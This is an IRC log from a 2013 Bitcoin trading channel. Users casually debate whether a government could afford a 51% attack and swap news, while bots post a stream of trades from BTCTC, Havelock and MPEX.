Aug 16 21:50:18 I know. Not implying it will happen Aug 16 21:50:26 yes you were Aug 16 21:50:41 I don't think it will happen. Aug 16 21:50:54 what do you think will happen Aug 16 21:50:57 What I'm implying is it wouldn't be too costly. Aug 16 21:51:20 I expect the USG to slowly run in circles churning out regulations Aug 16 21:51:22 well thats what were arguing Aug 16 21:51:25 it would be too costly Aug 16 21:51:30 because it would be a waste of monety Aug 16 21:51:53 Well, I could see it starting a cyberwar like someone else suggested Aug 16 21:51:57 i wonder why nobody mentions chinese govt. they can do whatever they want now practically for free Aug 16 21:52:06 just squeezing friedcat & co Aug 16 21:52:50 That's why they won't do it. They'll never justify the expense. Aug 16 21:52:57 That doesn't mean its too costly Aug 16 21:53:19 I could be way off base here- the Chinese seem to take business advice from Hong Kong because it makes money Aug 16 21:53:29 "They'll never justify the expense. That doesn't mean its too costly" Aug 16 21:53:33 uuu Aug 16 21:53:39 hehe Aug 16 21:54:10 ThickAsThieves: why are you sabotaging me Aug 16 21:54:12 Costly doesn't necessarily mean it's not cost effective. Aug 16 21:54:12 presuming it shows on any public budget anywhere Aug 16 21:54:27 Not too costly in the sense that they could easily afford it. Aug 16 21:55:08 ? Aug 16 21:55:09 CIA can do IPO easily and have both chips and profit Aug 16 21:55:34 USG can't fight tech with tech Aug 16 21:55:48 theyll get china, US, and Anon hackers afte rthem Aug 16 21:55:52 which they couldnt handle Aug 16 21:56:20 I never said they would or would think its a good idea Aug 16 21:56:43 I'm just saying it would be currently completly possible and affordable to do a 51% attack. Aug 16 21:56:49 and that's it. Aug 16 21:57:20 Don't try to assume more out of it because I agree with pretty much all what you're saying. Aug 16 21:58:27 well, nobody argues about that either Aug 16 21:58:54 .d Aug 16 21:58:58 50810339.04828 | Next Diff in 1514 blocks | Estimated Change: 14.8864% in 8d 22h 45m 46s Aug 16 21:59:00 your point amounts to, USG has a lot of money Aug 16 21:59:07 we all know this Aug 16 21:59:57 No, that it's currently not unaffordable to do a 51% attack, wether it be any government or many private group/entities. Aug 16 22:00:26 but it's profitable? Aug 16 22:00:50 I never said it was or that anyone would think its a good idea ._. Aug 16 22:01:47 It would be a total waste of fund just to destroy something. Aug 16 22:03:30 crypto currency is like a virus Aug 16 22:03:35 if they try to kill it Aug 16 22:03:42 so, you insist on just being mr.obvious. okay. Aug 16 22:03:43 [BTCTC] [DMS.MINING] 2 @ 0.003343 = 0.0067 BTC [+] Aug 16 22:03:43 it will just expedite it getting stromger Aug 16 22:05:04 yes, it's the idea. it can't now be uninvented (unless our whole civilization fails) Aug 16 22:05:16 I'm just denying that I ever tried to imply it would be interesting/profitable/someone would do it. Aug 16 22:05:25 I was merely commenting back to Hollywood Aug 16 22:05:28 [14:40] ah, it is too late anyway - the network will be at 1PH soon, scattered all over the planet Aug 16 22:05:39 That it's not too late, it's still feasible. Aug 16 22:05:45 An analogy would be Record companies trying to stop music piracy (P2P, copies, whatever) sure they slowed it down and shut down some of the early innovators.. but the idea of P2P sharing remains, better than before Aug 16 22:05:46 Not that I think anyone would Aug 16 22:06:19 I'm aware, TaT Aug 16 22:06:34 sorry, i got thrown off by the French Aug 16 22:06:41 thought maybe you were from the past Aug 16 22:06:43 ;) Aug 16 22:06:54 dammit Aug 16 22:07:22 Namworld , you need to go to bed and start over again Aug 16 22:07:44 Start over what? Aug 16 22:07:49 the day Aug 16 22:07:53 [HAVELOCK] [XBOND] 568 @ 0.0010655 = 0.6052 BTC [+] Aug 16 22:07:54 [HAVELOCK] [XBOND] 628 @ 0.0010655 = 0.6691 BTC [+] Aug 16 22:07:57 [HAVELOCK] [XBOND] 628 @ 0.0010655 = 0.6691 BTC [+] Aug 16 22:08:05 there you go Aug 16 22:08:47 you used up your extra guy- you need to go find a green mushroom Aug 16 22:09:08 [HAVELOCK] [AM100] 50 @ 0.038 = 1.9 BTC [+] Aug 16 22:09:16 That's not how savegames work Aug 16 22:10:04 [HAVELOCK] [XBOND] 169 @ 0.0010658 = 0.1801 BTC [+] Aug 16 22:11:09 [BTCTC] [DMS.SELLING] 1 @ 0.0179 BTC [-] Aug 16 22:20:02 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [-] Aug 16 22:20:31 [BTCTC] [DMS.MINING] 6 @ 0.003299 = 0.0198 BTC [-] Aug 16 22:20:34 [BTCTC] [DMS.MINING] 6 @ 0.003255 = 0.0195 BTC [-] Aug 16 22:21:29 Namworld is the uber canadian Aug 16 22:25:29 [BTCTC] [BFMINES] 1 @ 0.001699 BTC [+] Aug 16 22:28:43 [BTCTC] [BFMINES] 4 @ 0.0017 = 0.0068 BTC [+] Aug 16 22:33:12 [BTCTC] [DMS.MINING] 6 @ 0.003281 = 0.0197 BTC [+] Aug 16 22:34:22 Why don't they have a bitfunder feed here? Aug 16 22:36:39 [BTCTC] [DMS.PURCHASE] 10 @ 0.02078 = 0.2078 BTC [-] Aug 16 22:39:17 [00:28:45] the20year: the reason the other bot doesnt list bf trades is because they want 8 btc for it Aug 16 22:39:22 [BTCTC] [DMS.MINING] 10 @ 0.00328 = 0.0328 BTC [-] Aug 16 22:39:41 lawl Aug 16 22:39:45 8btc Aug 16 22:39:56 I rather put up a fake ipo on btct Aug 16 22:40:04 "[15:21] Namworld is the uber canadian" Aug 16 22:40:06 What? Aug 16 22:40:25 Namworld: explain and apologize! Aug 16 22:41:17 [BTCTC] [DMS.SELLING] 1 @ 0.01761 BTC [-] Aug 16 22:41:20 [BTCTC] [DMS.SELLING] 8 @ 0.0176 = 0.1408 BTC [-] Aug 16 22:41:22 [BTCTC] [DMS.SELLING] 9 @ 0.0176 = 0.1584 BTC [-] Aug 16 22:41:27 [BTCTC] [DMS.SELLING] 2 @ 0.0176 = 0.0352 BTC [-] Aug 16 22:41:36 oh you already thoroughly explained yourself what you meant and what not... but we're still waiting for apology =) Aug 16 22:42:18 [BTCTC] [DMS.PURCHASE] 19 @ 0.02078 = 0.3948 BTC [-] Aug 16 22:42:31 Apology for? ._. Aug 16 22:42:35 [BTCTC] [ACTIVEMINING] 15 @ 0.00539 = 0.0809 BTC [+] Aug 16 22:42:36 [BTCTC] [ACTIVEMINING] 8 @ 0.005391 = 0.0431 BTC [+] Aug 16 22:43:13 apology for repeating the obvious comes to mind Aug 16 22:43:17 I'll pay BF's 8btc if you make it say ButFunder Aug 16 22:43:23 then he can pay me 8btc to remove it Aug 16 22:43:28 For being confusing? For not being clear enough at first? Aug 16 22:43:33 ButtFunder Aug 16 22:43:39 Yes, yes, that would be very canadian I suppose Aug 16 22:43:54 But I'm french canadian. Aug 16 22:44:17 [BTCTC] [ACTIVEMINING] 14 @ 0.005384 = 0.0754 BTC [-] Aug 16 22:44:30 [BTCTC] [ACTIVEMINING] 60 @ 0.005385 = 0.3231 BTC [+] Aug 16 22:45:05 Sadly, I don't have time to apologize every sentence. Aug 16 22:45:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.03851 BTC [-] Aug 16 22:45:14 For everything Aug 16 22:45:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03851 BTC [-] Aug 16 22:45:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.03851 = 0.1155 BTC [-] Aug 16 22:45:49 so you just kinda apologized for not apologizing enough. Okay. Aug 16 22:45:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.03851 = 0.3851 BTC [-] Aug 16 22:46:13 xD Aug 16 22:48:27 I'm still partially Canadian, can't help it Aug 16 22:50:05 OTC trading and whatnot Aug 16 22:51:55 [BTCTC] [BTC-TRADING-PT] 5 @ 0.81 = 4.05 BTC [-] Aug 16 22:51:57 [BTCTC] [BTC-TRADING-PT] 20 @ 0.8093 = 16.186 BTC [-] Aug 16 22:53:18 [HAVELOCK] [XBOND] 345 @ 0.0010506 = 0.3625 BTC [-] Aug 16 23:02:32 [BTCTC] [DMS.MINING] 5 @ 0.0033 = 0.0165 BTC [+] Aug 16 23:02:52 [BTCTC] [ACTIVEMINING] 2 @ 0.00539 = 0.0108 BTC [+] Aug 16 23:03:34 [BTCTC] [DMS.SELLING] 5 @ 0.0178 = 0.089 BTC [+] Aug 16 23:03:39 [BTCTC] [DMS.MINING] 5 @ 0.00328 = 0.0164 BTC [-] Aug 16 23:03:46 [BTCTC] [DMS.PURCHASE] 5 @ 0.02078 = 0.1039 BTC [-] Aug 16 23:04:01 [BTCTC] [DMS.MINING] 4 @ 0.0033 = 0.0132 BTC [+] Aug 16 23:07:26 [BTCTC] [LABCOIN] 3 @ 0.001606 = 0.0048 BTC [-] Aug 16 23:08:27 [BTCTC] [TAT.MINIGAME] 25 @ 0.000274 = 0.0069 BTC [-] Aug 16 23:12:20 [BTCTC] [BTC-GROWTH] 100 @ 0.1044 = 10.44 BTC [-] Aug 16 23:14:19 [HAVELOCK] [AM100] 5 @ 0.0379999 = 0.19 BTC [-] Aug 16 23:16:18 [BTCTC] [DMS.PURCHASE] 1 @ 0.02078 BTC [-] Aug 16 23:21:02 [BTCTC] [DMS.MINING] 3 @ 0.00329 = 0.0099 BTC [-] Aug 16 23:22:02 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 16 23:23:10 [MPEX] [S.MPOE] 5996 @ 0.00083364 = 4.9985 BTC [-] Aug 16 23:25:01 [BTCTC] [LABCOIN] 3 @ 0.001606 = 0.0048 BTC [-] Aug 16 23:25:02 [BTCTC] [LABCOIN] 7 @ 0.001607 = 0.0112 BTC [+] Aug 16 23:25:30 http://www.bbc.co.uk/news/world-us-canada-23732965 Aug 16 23:25:33 BBC News - Republicans vow to boycott CNN and NBC over Clinton films Aug 16 23:26:03 the right is just incorrigable it seems Aug 16 23:26:38 they are making boycott threats to the media outlets they need because they plan to air Hilary movies 2 years before the elections Aug 16 23:28:08 [BTCTC] [DMS.MINING] 6 @ 0.00329 = 0.0197 BTC [-] Aug 16 23:28:11 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [+] Aug 16 23:29:38 They need to forcus on Elizabeth Warren Aug 16 23:29:41 ffs Aug 16 23:29:49 Clinton nothing more than another puppet Aug 16 23:29:54 is nothing* Aug 16 23:30:30 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 16 23:30:43 If they had to pick a democrate that is Aug 16 23:30:50 https://bitcointalk.org/index.php?topic=269191.msg2947641#msg2947641 Aug 16 23:30:56 [HAVELOCK] Crypto Currency (CFIG) Official Thread Aug 16 23:31:30 [HAVELOCK] [AM100] 3 @ 0.037 = 0.111 BTC [-] Aug 16 23:32:19 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 16 23:33:34 hrm Aug 16 23:36:02 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 16 23:36:10 [BTCTC] [ACTIVEMINING] 8 @ 0.005383 = 0.0431 BTC [-] Aug 16 23:36:13 [BTCTC] [ACTIVEMINING] 20 @ 0.005383 = 0.1077 BTC [-] Aug 16 23:38:12 [BTCTC] [BITVPS] 1 @ 0.00267 BTC [-] Aug 16 23:40:57 [BTCTC] [BTC-GROWTH] 3 @ 0.1044 = 0.3132 BTC [-] Aug 16 23:41:00 [BTCTC] [BTC-GROWTH] 2 @ 0.1045 = 0.209 BTC [+] Aug 16 23:43:28 [BTCTC] [BTC-GROWTH] 5 @ 0.1045 = 0.5225 BTC [+] Aug 16 23:43:43 [BTCTC] [LABCOIN] 3 @ 0.001606 = 0.0048 BTC [-] Aug 16 23:44:10 [BTCTC] [LABCOIN] 3 @ 0.001606 = 0.0048 BTC [-] Aug 16 23:45:47 [BTCTC] [BASIC-MINING] 2 @ 0.3141 = 0.6282 BTC [+] Aug 16 23:45:53 [BTCTC] [LABCOIN] 49 @ 0.001607 = 0.0787 BTC [+] Aug 16 23:46:45 [BTCTC] [BTC-BOND] 15 @ 0.009821 = 0.1473 BTC [-] Aug 16 23:47:12 [BTCTC] [BTC-GROWTH] 3 @ 0.1045 = 0.3135 BTC [+] Aug 16 23:47:14 [BTCTC] [BTC-GROWTH] 5 @ 0.1048 = 0.524 BTC [+] Aug 16 23:47:37 [BTCTC] [DMS.MINING] 20 @ 0.003299 = 0.066 BTC [-] Aug 16 23:49:33 [BTCTC] [DMS.MINING] 6 @ 0.00328 = 0.0197 BTC [-] Aug 16 23:49:40 [BTCTC] [LTC-ATF.B2] 10 @ 0.01049 = 0.1049 BTC [+] Aug 16 23:50:17 [BTCTC] [DMS.MINING] 10 @ 0.003299 = 0.033 BTC [+] Aug 16 23:50:44 [BTCTC] [DMS.SELLING] 1 @ 0.0177 BTC [-] Aug 16 23:50:49 [BTCTC] [DMS.PURCHASE] 1 @ 0.02078 BTC [-] Aug 16 23:51:18 [BTCTC] [NASTY-PT] 1 @ 0.0041 BTC [-] Aug 16 23:51:36 [BTCTC] [DMS.MINING] 6 @ 0.00328 = 0.0197 BTC [-] Aug 16 23:52:33 [BTCTC] [DMS.MINING] 6 @ 0.00327 = 0.0196 BTC [-] Aug 16 23:52:35 [BTCTC] [DMS.MINING] 3 @ 0.00326 = 0.0098 BTC [-] Aug 16 23:52:36 [BTCTC] [DMS.MINING] 4 @ 0.00317 = 0.0127 BTC [-] Aug 16 23:52:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001159 BTC [-] Aug 16 23:59:00 [HAVELOCK] [AM100] 2 @ 0.037 = 0.074 BTC [-] Aug 17 00:02:57 [BTCTC] [BASIC-MINING] 2 @ 0.3004 = 0.6008 BTC [-] Aug 17 00:03:02 [BTCTC] [BASIC-MINING] 7 @ 0.3003 = 2.1021 BTC [-] Aug 17 00:03:04 [BTCTC] [BASIC-MINING] 64 @ 0.3002 = 19.2128 BTC [-] Aug 17 00:06:09 [BTCTC] [DMS.MINING] 1 @ 0.003295 BTC [+] Aug 17 00:12:28 [BTCTC] [DMS.PURCHASE] 40 @ 0.02078 = 0.8312 BTC [-] Aug 17 00:17:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001159 BTC [-] Aug 17 00:19:57 [BTCTC] [ACTIVEMINING] 5 @ 0.00527 = 0.0264 BTC [-] Aug 17 00:20:01 [BTCTC] [ACTIVEMINING] 6 @ 0.005248 = 0.0315 BTC [-] Aug 17 00:20:06 [BTCTC] [ACTIVEMINING] 47 @ 0.005235 = 0.246 BTC [-] Aug 17 00:21:41 [BTCTC] [CRYPTO-TRADE] 1 @ 0.195 BTC [-] Aug 17 00:26:20 [HAVELOCK] [CFIG] 500 @ 0.15 = 75 BTC Aug 17 00:26:35 whoa. Aug 17 00:29:08 [BTCTC] [TAT.VIRTUALMINE] 57 @ 0.00116 = 0.0661 BTC [+] Aug 17 00:33:18 [BTCTC] [ACTIVEMINING] 8 @ 0.005228 = 0.0418 BTC [-] Aug 17 00:33:21 [BTCTC] [ACTIVEMINING] 100 @ 0.005227 = 0.5227 BTC [-] Aug 17 00:33:23 [BTCTC] [ACTIVEMINING] 6 @ 0.0052 = 0.0312 BTC [-] Aug 17 00:34:07 .d Aug 17 00:34:13 ;;nethash Aug 17 00:34:14 428374.495702 Aug 17 00:34:16 50810339.04828 | Next Diff in 1497 blocks | Estimated Change: 15.3120% in 8d 18h 53m 24s Aug 17 00:36:46 http://bcoinnews.com/2013/08/16/bitsyncom-chip-update/ Aug 17 00:37:01 [BTCTC] [ACTIVEMINING] 14 @ 0.00528 = 0.0739 BTC [+] Aug 17 00:37:08 [BTCTC] [ACTIVEMINING] 6 @ 0.00528 = 0.0317 BTC [+] Aug 17 00:38:00 [BTCTC] [ACTIVEMINING] 5 @ 0.005303 = 0.0265 BTC [+] Aug 17 00:39:46 [BTCTC] [ACTIVEMINING] 49 @ 0.005299 = 0.2597 BTC [-] Aug 17 00:41:50 .d Aug 17 00:41:51 50810339.04828 | Next Diff in 1497 blocks | Estimated Change: 15.3120% in 8d 18h 45m 49s Aug 17 00:42:18 [BTCTC] [DMS.MINING] 25 @ 0.003208 = 0.0802 BTC [-] Aug 17 00:42:19 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Aug 17 00:42:21 [BTCTC] [DMS.MINING] 10 @ 0.003195 = 0.032 BTC [-] Aug 17 00:42:23 [BTCTC] [DMS.MINING] 3 @ 0.003195 = 0.0096 BTC [-] Aug 17 00:42:25 [BTCTC] [DMS.MINING] 5 @ 0.003169 = 0.0158 BTC [-] Aug 17 00:42:27 [BTCTC] [DMS.MINING] 27 @ 0.003169 = 0.0856 BTC [-] Aug 17 00:42:28 [BTCTC] [DMS.MINING] 98 @ 0.003167 = 0.3104 BTC [-] Aug 17 00:42:30 [BTCTC] [DMS.MINING] 9 @ 0.003106 = 0.028 BTC [-] Aug 17 00:42:31 [BTCTC] [DMS.MINING] 25 @ 0.003105 = 0.0776 BTC [-] Aug 17 00:42:32 [BTCTC] [DMS.MINING] 25 @ 0.0031 = 0.0775 BTC [-] Aug 17 00:42:34 [BTCTC] [DMS.MINING] 40 @ 0.0031 = 0.124 BTC [-] Aug 17 00:46:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0389 BTC [+] Aug 17 00:46:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.0389 = 0.1167 BTC [+] Aug 17 00:49:25 [BTCTC] [ACTIVEMINING] 44 @ 0.0052 = 0.2288 BTC [-] Aug 17 00:50:03 [BTCTC] [ACTIVEMINING] 6 @ 0.005181 = 0.0311 BTC [-] Aug 17 00:51:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1989 BTC [+] Aug 17 00:59:21 [BTCTC] [BTC-GROWTH] 5 @ 0.1046 = 0.523 BTC [-] Aug 17 01:03:14 [BTCTC] [BASIC-MINING] 1 @ 0.2999 BTC [-] Aug 17 01:03:23 [BTCTC] [BASIC-MINING] 1 @ 0.297 BTC [-] Aug 17 01:03:24 [HAVELOCK] [AM100] 3 @ 0.0379 = 0.1137 BTC [+] Aug 17 01:03:27 [BTCTC] [BASIC-MINING] 8 @ 0.2938 = 2.3504 BTC [-] Aug 17 01:03:45 [BTCTC] [LABCOIN] 1 @ 0.001626 BTC [+] Aug 17 01:03:47 [BTCTC] [LABCOIN] 4 @ 0.001666 = 0.0067 BTC [+] Aug 17 01:03:49 [BTCTC] [LABCOIN] 29 @ 0.001668 = 0.0484 BTC [+] Aug 17 01:03:49 [BTCTC] [LABCOIN] 233 @ 0.001669 = 0.3889 BTC [+] Aug 17 01:03:50 [BTCTC] [LABCOIN] 98 @ 0.001686 = 0.1652 BTC [+] Aug 17 01:05:08 [HAVELOCK] [XBOND] 1 @ 0.001065 BTC [+] Aug 17 01:06:41 [BTCTC] [BTC-GROWTH] 6 @ 0.1046 = 0.6276 BTC [-] Aug 17 01:11:52 [BTCTC] [DMS.MINING] 1 @ 0.00329 BTC [+] Aug 17 01:13:12 [HAVELOCK] [XBOND] 11 @ 0.0010652 = 0.0117 BTC [+] Aug 17 01:13:17 [BTCTC] [DMS.SELLING] 1 @ 0.0176 BTC [-] Aug 17 01:13:18 [BTCTC] [DMS.SELLING] 20 @ 0.0176 = 0.352 BTC [-] Aug 17 01:13:20 [BTCTC] [DMS.SELLING] 10 @ 0.01752 = 0.1752 BTC [-] Aug 17 01:13:21 [BTCTC] [DMS.SELLING] 20 @ 0.0174 = 0.348 BTC [-] Aug 17 01:13:23 [BTCTC] [DMS.SELLING] 30 @ 0.0174 = 0.522 BTC [-] Aug 17 01:13:24 [BTCTC] [DMS.SELLING] 1 @ 0.0173 BTC [-] Aug 17 01:20:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005282 BTC [+] Aug 17 01:20:24 [BTCTC] [ACTIVEMINING] 10 @ 0.005295 = 0.053 BTC [+] Aug 17 01:20:24 [BTCTC] [ACTIVEMINING] 50 @ 0.005296 = 0.2648 BTC [+] Aug 17 01:20:28 [BTCTC] [ACTIVEMINING] 6 @ 0.005296 = 0.0318 BTC [+] Aug 17 01:20:30 [BTCTC] [ACTIVEMINING] 9 @ 0.005296 = 0.0477 BTC [+] Aug 17 01:22:31 [BTCTC] [DMS.MINING] 6 @ 0.003202 = 0.0192 BTC [-] Aug 17 01:22:32 [BTCTC] [DMS.MINING] 10 @ 0.003201 = 0.032 BTC [-] Aug 17 01:22:34 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Aug 17 01:22:35 [BTCTC] [DMS.MINING] 2 @ 0.003101 = 0.0062 BTC [-] Aug 17 01:22:37 [BTCTC] [DMS.MINING] 10 @ 0.0031 = 0.031 BTC [-] Aug 17 01:23:38 [BTCTC] [LABCOIN] 16 @ 0.00164 = 0.0262 BTC [-] Aug 17 01:23:53 [BTCTC] [DMS.SELLING] 1 @ 0.0173 BTC [-] Aug 17 01:23:55 [BTCTC] [DMS.SELLING] 60 @ 0.01717 = 1.0302 BTC [-] Aug 17 01:24:00 [BTCTC] [DMS.SELLING] 40 @ 0.01715 = 0.686 BTC [-] Aug 17 01:24:02 [BTCTC] [DMS.SELLING] 280 @ 0.01703 = 4.7684 BTC [-] Aug 17 01:29:21 [BTCTC] [ACTIVEMINING] 53 @ 0.005289 = 0.2803 BTC [-] Aug 17 01:34:28 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 17 01:35:26 coinbase should let you hold usd without sending to bank Aug 17 01:35:26 [BTCTC] [ACTIVEMINING] 5 @ 0.005304 = 0.0265 BTC [+] Aug 17 01:35:27 [BTCTC] [ACTIVEMINING] 20 @ 0.005305 = 0.1061 BTC [+] Aug 17 01:36:41 https://bitcointalk.org/index.php?topic=5441.msg2947877#msg2947877 Aug 17 01:36:44 no exchange yet Aug 17 01:36:46 BitMarket.Eu has closed down. A new secure site Bitalo.com is coming soon. Aug 17 01:36:48 but here, a facebook page. Aug 17 01:42:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [+] Aug 17 01:46:48 [BTCTC] [LABCOIN] 1 @ 0.001653 BTC [+] Aug 17 01:47:26 [HAVELOCK] [XBOND] 625 @ 0.0010657 = 0.6661 BTC [+] Aug 17 02:07:58 [BTCTC] [DMS.SELLING] 200 @ 0.01705 = 3.41 BTC [+] Aug 17 02:07:59 [BTCTC] [DMS.SELLING] 1 @ 0.01705 BTC [+] Aug 17 02:08:01 [BTCTC] [DMS.SELLING] 20 @ 0.01705 = 0.341 BTC [+] Aug 17 02:08:03 [BTCTC] [DMS.SELLING] 75 @ 0.01703 = 1.2773 BTC [-] Aug 17 02:08:03 [BTCTC] [DMS.SELLING] 250 @ 0.01702 = 4.255 BTC [-] Aug 17 02:08:04 [BTCTC] [DMS.SELLING] 80 @ 0.0168 = 1.344 BTC [-] Aug 17 02:10:32 [HAVELOCK] [SMG] 1 @ 0.000259 BTC [+] Aug 17 02:11:21 [HAVELOCK] [SDSTM] 20 @ 0.0061 = 0.122 BTC [-] Aug 17 02:11:23 [HAVELOCK] [SDSTM] 72 @ 0.0060054 = 0.4324 BTC [-] Aug 17 02:11:26 [HAVELOCK] [SDSTM] 72 @ 0.0060054 = 0.4324 BTC [-] Aug 17 02:11:28 [HAVELOCK] [SDSTM] 72 @ 0.0060054 = 0.4324 BTC [-] Aug 17 02:11:30 [HAVELOCK] [SDSTM] 15 @ 0.006001 = 0.09 BTC [-] Aug 17 02:11:32 [HAVELOCK] [SDSTM] 249 @ 0.006 = 1.494 BTC [-] Aug 17 02:11:39 [BTCTC] [S.MPOE-PT] 1 @ 0.0009 BTC [+] Aug 17 02:14:11 [HAVELOCK] [CFIG] 85 @ 0.15 = 12.75 BTC Aug 17 02:15:31 [BTCTC] [LABCOIN] 1 @ 0.001646 BTC [-] Aug 17 02:15:31 [BTCTC] [LABCOIN] 4 @ 0.001647 = 0.0066 BTC [+] Aug 17 02:25:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.0385 = 0.385 BTC [-] Aug 17 02:25:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.0385 = 0.231 BTC [-] Aug 17 02:25:34 [BTCTC] [TAT.ASICMINER] 13 @ 0.0383 = 0.4979 BTC [-] Aug 17 02:25:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0383 = 0.1915 BTC [-] Aug 17 02:25:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0382 BTC [-] Aug 17 02:25:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.03811 = 0.3811 BTC [-] Aug 17 02:34:39 [BTCTC] [DMS.SELLING] 9 @ 0.0177 = 0.1593 BTC [+] Aug 17 02:34:53 [BTCTC] [LABCOIN] 1 @ 0.001625 BTC [-] Aug 17 02:39:45 .d Aug 17 02:39:45 50810339.04828 | Next Diff in 1482 blocks | Estimated Change: 15.1238% in 8d 17h 26m 26s Aug 17 02:39:50 ;;nethash Aug 17 02:39:50 429151.995065 Aug 17 02:43:23 [BTCTC] [DMS.SELLING] 50 @ 0.017 = 0.85 BTC [-] Aug 17 02:43:25 [BTCTC] [DMS.SELLING] 20 @ 0.017 = 0.34 BTC [-] Aug 17 02:44:34 [BTCTC] [DMS.MINING] 16 @ 0.003289 = 0.0526 BTC [+] Aug 17 02:46:13 ;;tslb Aug 17 02:46:14 Time since last block: 43 seconds Aug 17 02:46:27 [BTCTC] [DMS.MINING] 1 @ 0.003289 BTC [+] Aug 17 02:47:00 [BTCTC] [DMS.MINING] 9 @ 0.003289 = 0.0296 BTC [+] Aug 17 02:47:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.03811 = 0.3811 BTC [-] Aug 17 02:47:18 [BTCTC] [TAT.ASICMINER] 19 @ 0.03811 = 0.7241 BTC [-] Aug 17 02:49:58 [BTCTC] [LABCOIN] 20 @ 0.001626 = 0.0325 BTC [+] Aug 17 02:55:43 [MPEX] [S.MPOE] 9580 @ 0.00083521 = 8.0013 BTC [+] Aug 17 02:55:45 [MPEX] [S.MPOE] 3020 @ 0.0008373 = 2.5286 BTC [+] Aug 17 02:58:04 lol me and mod6 hangin' out in eulora Aug 17 02:59:57 [BTCTC] [ACTIVEMINING] 11 @ 0.005297 = 0.0583 BTC [-] Aug 17 03:00:32 [BTCTC] [LABCOIN] 1 @ 0.001632 BTC [+] Aug 17 03:01:28 [BTCTC] [S.MPOE-PT] 1 @ 0.0008602 BTC [-] Aug 17 03:01:57 [BTCTC] [DMS.SELLING] 100 @ 0.017 = 1.7 BTC [-] Aug 17 03:02:13 [BTCTC] [ASICMINER-PT] 1 @ 3.879 BTC [+] Aug 17 03:02:28 [BTCTC] [ACTIVEMINING] 1 @ 0.005297 BTC [-] Aug 17 03:05:28 [HAVELOCK] [LABCO] 29 @ 0.00177 = 0.0513 BTC [+] Aug 17 03:08:17 [HAVELOCK] [CFIG] 500 @ 0.15 = 75 BTC Aug 17 03:10:05 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 17 03:11:25 [BTCTC] [ACTIVEMINING] 7 @ 0.005297 = 0.0371 BTC [-] Aug 17 03:11:59 [BTCTC] [LABCOIN] 30 @ 0.001654 = 0.0496 BTC [-] Aug 17 03:12:07 [MPEX] [S.MPOE] 6116 @ 0.0008373 = 5.1209 BTC [+] Aug 17 03:12:08 [MPEX] [S.MPOE] 34362 @ 0.00083797 = 28.7943 BTC [+] Aug 17 03:13:14 [BTCTC] [LABCOIN] 20 @ 0.001655 = 0.0331 BTC [+] Aug 17 03:16:07 [MPEX] [S.MPOE] 3317 @ 0.00083797 = 2.7795 BTC [+] Aug 17 03:17:29 [BTCTC] [LABCOIN] 1 @ 0.001653 BTC [-] Aug 17 03:18:00 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 17 03:19:41 [BTCTC] [LABCOIN] 30 @ 0.001633 = 0.049 BTC [-] Aug 17 03:19:58 [BTCTC] [LABCOIN] 30 @ 0.001634 = 0.049 BTC [+] Aug 17 03:20:00 [BTCTC] [LABCOIN] 25 @ 0.001633 = 0.0408 BTC [-] Aug 17 03:21:13 [BTCTC] [DMS.SELLING] 4 @ 0.0169 = 0.0676 BTC [-] Aug 17 03:21:16 [BTCTC] [DMS.SELLING] 20 @ 0.0168 = 0.336 BTC [-] Aug 17 03:21:18 [BTCTC] [DMS.SELLING] 124 @ 0.0165 = 2.046 BTC [-] Aug 17 03:22:34 [BTCTC] [DMS.SELLING] 276 @ 0.0165 = 4.554 BTC [-] Aug 17 03:22:36 [BTCTC] [DMS.SELLING] 15 @ 0.0165 = 0.2475 BTC [-] Aug 17 03:27:23 [BTCTC] [LABCOIN] 1 @ 0.00165 BTC [+] Aug 17 03:27:24 [BTCTC] [LABCOIN] 11 @ 0.001651 = 0.0182 BTC [+] Aug 17 03:29:26 [BTCTC] [DMS.PURCHASE] 4 @ 0.02078 = 0.0831 BTC [-] Aug 17 03:32:05 [HAVELOCK] [VTX] 1 @ 0.60451 BTC [+] Aug 17 03:32:16 [HAVELOCK] [VTX] 44 @ 0.6045 = 26.598 BTC [-] Aug 17 03:35:49 [BTCTC] [ACTIVEMINING] 8 @ 0.005298 = 0.0424 BTC [+] Aug 17 03:37:17 [BTCTC] [BFMINES] 46 @ 0.0017 = 0.0782 BTC [+] Aug 17 03:37:51 [BTCTC] [BFMINES] 4 @ 0.0018 = 0.0072 BTC [+] Aug 17 03:39:58 [BTCTC] [BFMINES] 1 @ 0.00185 BTC [+] Aug 17 03:43:14 [BTCTC] [ACTIVEMINING] 101 @ 0.005297 = 0.535 BTC [-] Aug 17 03:47:11 [BTCTC] [B.YABMC] 1 @ 0.0027 BTC [+] Aug 17 03:47:33 [BTCTC] [DMS.MINING] 4 @ 0.00329 = 0.0132 BTC [+] Aug 17 03:48:46 [BTCTC] [B.YABMC] 3 @ 0.002749 = 0.0082 BTC [+] Aug 17 03:48:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.03881 = 0.3493 BTC [+] Aug 17 03:49:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0012 BTC [+] Aug 17 03:50:17 